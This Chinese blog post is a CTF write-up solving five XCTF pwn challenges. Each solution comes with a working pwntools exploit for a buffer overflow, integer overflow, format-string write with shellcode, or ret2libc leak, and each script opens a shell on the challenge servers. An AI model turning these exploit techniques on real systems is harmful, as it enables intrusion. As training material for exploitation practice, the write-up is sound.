XCTF-pwn(二)

于 2025-05-02 17:33:40 发布
阅读量313 收藏 4
点赞数 3
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52273419/article/details/147668640
版权

guess_num

看一下文件信息

在这里插入图片描述

利用gets函数将seed[0]给覆盖掉

在这里插入图片描述

在这里插入图片描述

距离0x20

在这里插入图片描述

我们需要输入十次随机数产生的值

在这里插入图片描述

写一个c程序先预判当seed是a的时候产生的随机数分别是多少

在这里插入图片描述

payload

from pwn import*
from ctypes import*
context.log_level='debug'

r=remote("61.147.171.105", 62815)

payload=b'a'*0x20+p64(1)
print(payload)
r.recvuntil('Your name:')
r.sendline(payload)
libc=cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
libc.srand(1)
for i in range(10):
        r.recvuntil('number:')
        r.sendline(str(libc.rand()%6+1))
        
r.interactive()

flag:cyberpeace{2e7c160cb62a80184191528b13ddc215}

int_overflow

看一下文件信息

在这里插入图片描述

找到溢出点strcpy(dest,s)

在这里插入图片描述

best距离栈底0x14

在这里插入图片描述

这里存在整数溢出,v3最大为255

在这里插入图片描述

我们需要返回的地方

在这里插入图片描述

payload

from pwn import*

r=remote("61.147.171.105", 54712)

payload = b'a'*0x14 + b'a'*4 + p32(0x0804868B) + b'a'*235
r.sendlineafter("choice:",'1')
r.sendlineafter("username:",'www')
r.sendlineafter("passwd:",payload)
        
r.interactive()

flag:cyberpeace{63e478a14fceae29048fee68e5021529}

cgpwn2

看一下文件信息

在这里插入图片描述

放入ida,把/bin/bash写入name,再利用gets进行栈溢出

在这里插入图片描述

在这里插入图片描述

s大小

在这里插入图片描述

在这里插入图片描述

payload

from pwn import*

r=remote("223.112.5.141", 49209)

name_addr = 0x0804A080
system_addr = 0x0804855A
payload = b'a' * (0x26 + 0x4) + p32(system_addr) + p32(name_addr)
r.sendlineafter("please tell me your name\n", '/bin/sh')
r.sendlineafter("hello,you can leave some message here:\n",payload)

        
r.interactive()

flag:cyberpeace{55c8bc9b4f3bc2b669a2bb0890542431}

string

文件信息

在这里插入图片描述

存在格式化字符串

在这里插入图片描述

我们要让他执行到这里

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

payload

from pwn import *

r = remote("223.112.5.141", 60388)

r.recvuntil("secret[0] is".encode())
addr = int(r.recvuntil(b"\n")[:-1], 16)
r.recvuntil("What should your character's name be:\n".encode())
r.sendline("aaa")
r.recvuntil("So, where you will go?east or up?:\n".encode())
r.sendline("east")
r.recvuntil("go into there(1), or leave(0)?:\n".encode())
r.sendline("1")
r.recvuntil("'Give me an address'\n".encode())
r.sendline(str(addr))
r.recvuntil("And, you wish is:\n".encode())
payload = b'a' * 85 + "%7$n".encode()
r.sendline(payload)
shellcode = asm(shellcraft.amd64.linux.sh(), arch="amd64")
print(shellcode)
r.sendline(shellcode)

r.interactive()

flag:cyberpeace{7ed4bded12c985f033ff0fdd1a538af6}

level3

文件信息

在这里插入图片描述

main函数

在这里插入图片描述

vulnerable_function函数,return read(0, buf, 0x100u);存在溢出

在这里插入图片描述

libc中的函数的相对地址是固定的,要想获取到system函数的地址,可以通过write()函数进行offset计算。
payloa

from pwn import *

# 建立远程连接
r = remote("61.147.171.105", 65412)

# 使用ELF执行程序
elf_level3 = ELF('./level3')
elf_libc = ELF('./libc_32.so.6')
# 获得write()plt表地址
write_plt = elf_level3.plt['write']
# 获得write()got表地址
write_got = elf_level3.got['write']
# 获得mian函数实际地址
main_addr = elf_level3.symbols['main']
# 当程序执行到输出'Input:\n'时开始攻击read()函数
r.recvuntil('Input:\n')
# 'a'*(0x88+0x4):用于填充程序缓冲区及ebp地址,随便什么字符,填满就行
# p32(write_plt):用于覆盖返回地址,使用plt调用write()函数
# p32(main_addr):设置write()的返回地址为main();因为这一步payload只是为了返回write()的got地址,后续的实际攻击还需要继续使用main函数的read()方法,所以write()执行完毕后需要返回到main()
# p32(0):write()第一个参数,只要转换为p32格式就行
# p32(write_got):返回write()got表地址,这就是这句payload需要得到的信息
# p32(4):读入4个字节,也就是write()got表地址
payload_1 = b'a' * (0x88 + 0x4) + p32(write_plt) + p32(main_addr) + p32(0) + p32(write_got) + p32(4)
r.sendline(payload_1)
# 获得write()got表地址
write_got = (u32(r.recv()))
# 计算libc库中的write()地址与level3的write()地址的偏差
libc_py_deviation = write_got - elf_libc.symbols['write']
# 由于偏移是相同的,将偏差值加上libc库中的system地址,便得到了level3中system的实际地址
sys_addr = libc_py_deviation + elf_libc.symbols['system']
# /bin/sh在libc库的位置可以通过string命令配合管道符查看
# strings -a -t x libc_32.so.6 | grep "/bin/sh"
# 计算/bin/sh的实际地址,原理和system一样
binsh_addr = libc_py_deviation + 0x15902b
# 重新返回main函数,再次执行到输出'Input:\n'时,开始第二次攻击
r.recvuntil('Input:\n')
# p32(sys_addr):覆盖返回地址,跳转到system地址
# p32(0):覆盖system函数的返回地址,我们目的是获得/bin/sh,所以不care它返回到哪,填充4个字节就行
# p32(binsh_addr):传入system的参数/bin/sh
payload_2 = b'a' * (0x88 + 0x4) + p32(sys_addr) + p32(0) + p32(binsh_addr)
r.sendline(payload_2)

r.interactive()

flag:cyberpeace{550a1e0daec9fc8b9a839c1f36d7eeb7}

pencek
关注
XCTF-PWN welpwn
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-16 707
使用LibcSearcher解法 使用GDB动态调试下,发现 0x7fffffffdae0-0x7fffffffdb00是函数是echo的栈帧 0x7fffffffdb00开始就是属于main函数的栈帧 0x7fffffffdb00-0x7fffffffdb08是上一个栈帧的rbp,已经被覆盖 0x7fffffffdb08-0x7fffffffdb0f是retn返回的地址 可以通过4个pop把...
pwn1 babystack [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列19
重新启程
12-25 1761
题目地址:pwn1 babystack 已经到了高手进阶区的第八题了,已经渐入佳境了。哈哈! 废话不说,看看题目先 厦门邀请赛的题目,还是2星难度,那就开工了。 管理检查一下保护机制: [*] '/ctf/work/python/pwn1/babystack' Arch: amd64-64-little RELRO: Full RELRO Stac...
攻防世界XCTF-Pwn入门11题解题报告
HUANGXIN9898的博客
07-26 937
Pwn是CTF中至关重要的项目,一般来说都是Linux进制题目,零基础的同学可以看《程序员的自我修养》,主要题型包括:缓冲区溢出、Return to Libc、格式化字符串、PLT GOT等。
[XCTF-pwn] 22_format2
weixin_52640415的博客
03-08 279
移栈 一个移栈的小题,1:没开pie而且输入的内容放在bss中地址已知,2:程序的correct给了后门,虽然不能直接运行到但可以当后门用,3:auth函数将解码后的input复制到v4,而v4定义是ebp-8当输入大于8里就会溢出到ebp int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [esp+18h] [ebp-28h] BYREF char s[30]; // [esp+1Eh]
XCTF-pwn-stack2 - Writeup
菜小狗.的博客
11-28 613
偶尔在学习的阶段慢慢发现的进步 抽空写点笔记记录一下子 这次做的题目还是栈溢出漏洞的题目但是并没用用到payload,简单用了下ROP 题目描述 除了一个名称 stack2 题目描述是:暂无 下载附件运行一下看看流程 保护开启了nx 和canary 流程大概是提供了4个选项的功能:加数、改数还有求平均数啥的。 然后丢到iad里看一下这部分的流程简单分析一下漏洞点。 在这里看还是蛮正常的,...
[XCTF-pwn] 36_xctf-4th-WHCTF-2017_easypwn
weixin_52640415的博客
03-10 422
snprintf的格式化串中途被覆盖也会生效。 unsigned __int64 m1printf() { char s[1024]; // [rsp+10h] [rbp-BF0h] BYREF char v2[1000]; // [rsp+410h] [rbp-7F0h] BYREF char v3[1024]; // [rsp+7F8h] [rbp-408h] BYREF unsigned __int64 v4; // [rsp+BF8h] [rbp-8h] v4 = __re
[XCTF-pwn] 15_厦门邀请赛-pwn
weixin_52640415的博客
03-04 379
同样是写溢出到return的题,这题设置了canary,canary这个机制是把一个0+7位随机数放在rbp的前面,如果发现被改动就调用check_stack_fail然后退出。 这个题有循环,只有退出时才会检查,所以在前边可以输入适当长度带出canary在退出前再恢复 from pwn import * ''' patchelf --set-interpreter /home/shi/buuctf/buuoj_2.23_amd64/ld_2.23-0ubuntu10_amd64.so pwn
[XCTF-pwn] 37_xctf-4th-CyberEarth_play
weixin_52640415的博客
03-10 298
又买一个,实在是代码太我看不明白了。 解题思路: 用同一个用户登录两次,选择不同的攻击方式,直到成功。 成功后,输入名字的地方有溢出,在这里写入rop:泄露,修改got.puts为system,再调用puts(/bin/sh) 验证后的exp: from pwn import * ''' patchelf --set-interpreter /home/shi/buuctf/buuoj_2.23_i386/ld-2.23-i386-0ubuntu11.so pw...
XCTF-简单题-pwn-004
Morphy_Amo的博客
12-09 740
CTF-pwn-新手区-004
XCTF-PWN pwn-200(使用DynELF利用write泄露system地址)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-19 418
题目下载地址:点此下载 查保护 只开启了NX 查看是否有后面函数,没有!所以需要利用DynELF泄露system地址获取shell。 这题比较简单,就不写详细解释了,直接上EXP。 EXP: # -*- coding: utf-8 -*- # @Author: 夏了茶糜 # @Date: 2020-03-19 14:01:14 # @email: sxin0807@qq.com # @Las...
warmup [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列14
重新启程
12-23 1928
题目地址:warmup 这是高手进阶区的第三题,我们先看下题目内容 这个题目没有附件,那就是要fuzz的题目了,我们先正常走一下程序看看 root@mypwn:/ctf/work/python/warmup# nc 111.198.29.45 32453 -Warm Up- WOW:0x40060d >AAA 这个题目的出发点就是要大家做fuzz,看下提示内容有个地址0x40060...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8685
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
雷达驱动 rplidar-ros 与建图算法 hector-slam 资源包
05-03
雷达驱动 rplidar-ros 与建图算法 hector-slam 资源包
威纶通触摸屏与汇川SV660P伺服通讯程序:实现正反转控制、速度与电压监测功能,实时在线模拟并修改COM口监控模块温度
最新发布
05-03
内容概要:本文详细介绍了威纶通触摸屏与汇川SV660P伺服之间的Modbus RTU通讯实现方法,涵盖硬件接线、通讯参数配置、控制逻辑脚本编写以及状态监控等方面的内容。具体来说,文章首先讲解了硬件接线注意事项,如终端电阻设置和双绞线连接方式;接着深入探讨了通讯参数配置,包括波特率、数据位、停止位和校验方式等;然后展示了如何通过宏指令和Lua脚本实现正反转控制、速度设定等功能;最后讨论了状态监控部分,如母线电压和温度监测,并提供了相应的代码示例。此外,还分享了一些调试经验和常见问题解决方案。 适合人群:从事工业自动化领域的工程师和技术人员,尤其是对Modbus RTU通讯有一定了解的人群。 使用场景及目标:适用于需要通过触摸屏控制多台伺服电机并进行实时数据监控的场合,旨在帮助技术人员快速掌握具体的实现步骤和技巧,提高工作效率。 其他说明:文中提供的代码片段可以直接应用于实际项目中,但需要注意根据实际情况调整相关参数。同时,在调试过程中可能会遇到一些问题,如通讯不稳定或数据异常等,此时可以根据文中提到的经验进行排查和解决。
铜陵区县边界,矢量边界,shp格式
05-03
矢量边界,行政区域边界,精确到区县,可直接导入arcgis使用
基于机器学习的锂离子电池容量估计与寿命预测:多通道充电配置与神经网络应用
05-03
内容概要:本文详细探讨了利用机器学习技术进行锂离子电池容量估计和健康状态预测的方法。首先介绍了充电数据的获取和预处理步骤,包括电压、电流、温度等多通道时序数据的采集和归一化处理。接着分别尝试了三种不同的神经网络模型:前馈神经网络(FNN)、卷积神经网络(CNN)和长短时记忆网络(LSTM),并分析了各自的优缺点。实验结果显示,FNN适用于结构化特征,CNN擅长捕捉局部模式,LSTM则在处理时序依赖方面表现出色。最终提出了一种融合模型,结合CNN和LSTM的优势,实现了更高的预测精度。此外,文中还讨论了数据预处理、模型优化以及实际应用中的注意事项。 适合人群:从事电池管理系统、机器学习、数据分析等相关领域的研究人员和技术人员。 使用场景及目标:①用于电池健康状态监测系统的设计与开发;②提高电池容量估计的准确性,延长设备使用寿命;③优化电池管理系统的性能,确保设备安全运行。 其他说明:文中提供了详细的代码示例,帮助读者更好地理解和复现实验结果。同时强调了数据预处理和特征工程的重要性,指出合理的数据处理方式能够显著提升模型的表现。
Python遥感 - 栅格数据Sen+MK长时间序列趋势分析+显著性检验代码(附示例数据)
05-03
本研究利用Sen+MK方法分析了特定区域内的ET(蒸散发)趋势,重点评估了使用遥感数据的ET空间变化。该方法结合了Sen斜率估算器和Mann-Kendall(MK)检验,为评估长期趋势提供了稳健的框架,同时考虑了时间变化和统计显著性。 主要过程与结果: 1.ET趋势可视化:研究利用ET数据,通过ET-MK和ET趋势图展示了蒸散发在不同区域的空间和时间变化。这些图通过颜色渐变表示不同的ET水平及其趋势。 2.Mann-Kendall检验:应用MK检验来评估ET趋势的统计显著性。检验结果以元分类图呈现,标明ET变化的显著性,帮助识别出有显著变化的区域。 3.重分类结果:通过重分类处理,将区域根据ET变化的显著性进行分类,从而聚焦于具有显著变化的区域。这一过程确保分析集中在具有实际意义的发现上。 4.最终输出:最终结果以栅格图和png图的形式呈现,支持各种应用,包括政策规划、水资源管理和土地利用变化分析,这些都是基于详细的时空分析。 ------------------------------------------------------------------- 文件夹构造: data文件夹:原始数据,支持分析的基础数据(MOD16A2H ET数据 宁夏部分)。 results文件夹:分析结果与可视化,展示研究成果。 Sen+MK_optimized.py:主分析脚本,适合批量数据处理和自动化分析。 Sen+MK.ipynb:Jupyter Notebook,复现可视化地图。
WASM图像处理:Rust+WebGPU实现浏览器端AI推理.pdf
05-03
文档支持目录章节跳转同时还支持阅读器左侧大纲显示和章节快速定位,文档内容完整、条理清晰。文档内所有文字、图表、函数、目录等元素均显示正常,无任何异常情况,敬请您放心查阅与使用。文档仅供学习参考,请勿用作商业用途。 Rust 以内存安全、零成本抽象和并发高效的特性,重塑编程体验。无需垃圾回收,却能通过所有权与借用检查机制杜绝空指针、数据竞争等隐患。从底层系统开发到 Web 服务构建,从物联网设备到高性能区块链,它凭借出色的性能和可靠性,成为开发者的全能利器。拥抱 Rust,解锁高效、安全编程新境界!
C#三菱FX3U以太网MC协议客户端设计工程源码(带注释+开源dll文件+打包完的安装包)
05-03
内容概要:本文详细介绍了使用C#实现与三菱FX3U系列PLC基于以太网MC协议通信的客户端设计。首先,文中讲解了前期准备工作,如引入必要的网络通信库。接下来,深入探讨了关键代码,包括创建TCP连接、发送MC协议指令、构建命令帧、解析位元件状态等。此外,还提到了数据解析过程中的一些注意事项,如ASCII码转换和字节序处理。为了提高可靠性,实现了重试机制,采用指数退避算法应对网络波动。文中提供了开源的DLL文件,封装了所有协议细节,使调用方只需关注业务逻辑。同时,给出了打包好的安装包,便于快速部署。最后,强调了项目的实用性,展示了在工业自动化项目中的应用实例。 适合人群:从事工业自动化领域的研发人员,尤其是有一定C#编程基础并对PLC通信感兴趣的工程师。 使用场景及目标:适用于需要与三菱FX3U系列PLC进行以太网通信的工业自动化项目。主要目标是帮助开发者快速搭建稳定的通信客户端,减少重复开发的工作量,提升开发效率。 其他说明:项目已在GitHub上开源,包含详细的注释文档和应急调试手册,有助于开发者更好地理解和维护代码。
dice_game XCTF
01-14
### 关于Dice Game在XCTF竞赛中的问题材料 #### 题目概述 Dice Game 是 XCTF 竞赛中的一道 PWN 类型题目,该进制文件具有特定的安全特性配置。通过 `checksec` 工具检测发现此程序启用了完整的RELRO和NX位,但是未启用栈 Canary保护措施,并且支持PIE地址空间布局随机化[^1]。 #### 安全特征分析 - **架构**: 支持amd64架构下的小端模式。 - **RELRO (重定位读只)**: 启用完全版,有助于防止攻击者利用某些类型的内存破坏漏洞。 - **Stack Canaries(堆栈金丝雀)**: 缺失这项防护意味着可能存在缓冲区溢出风险。 - **NX Bit (No-eXecute bit, 数据执行保护)**: 开启状态阻止了恶意代码注入到数据区域并被执行的可能性。 - **PIE (位置独立可执行文件)**: 此选项使得每次加载时基址不同从而增加了预测返回地址难度。 #### 示例代码展示如何基于给定种子生成一系列伪随机数值 为了模拟骰子游戏内部可能使用的随机序列,下面给出了一段C语言源码片段用于重现这一过程: ```c #include <stdio.h> #include <stdlib.h> int main(){ unsigned int seed; seed = 0x30303030; // 设定固定的种子值 srand(seed); for(int i=0;i<50;i++) printf("%d\n", rand()); return 0; } ``` 这段代码初始化了一个已知的seed之后调用了`srand()`函数来设置随机数发生器的状态;接着在一个循环里连续打印出了由`rand()`产生的前五十个整数结果[^2]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值